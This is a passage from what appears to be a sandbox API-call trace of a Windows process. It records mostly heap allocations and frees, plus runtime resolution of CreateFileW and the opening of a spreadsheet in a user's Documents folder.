(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.913] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0075.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.914] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0075.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0075.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods" (normalized: "c:\\users\\fd1hvy\\documents\\czdg7aga6_wtvh.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.917] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.919] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.919] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.919] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0076.138] HeapFree 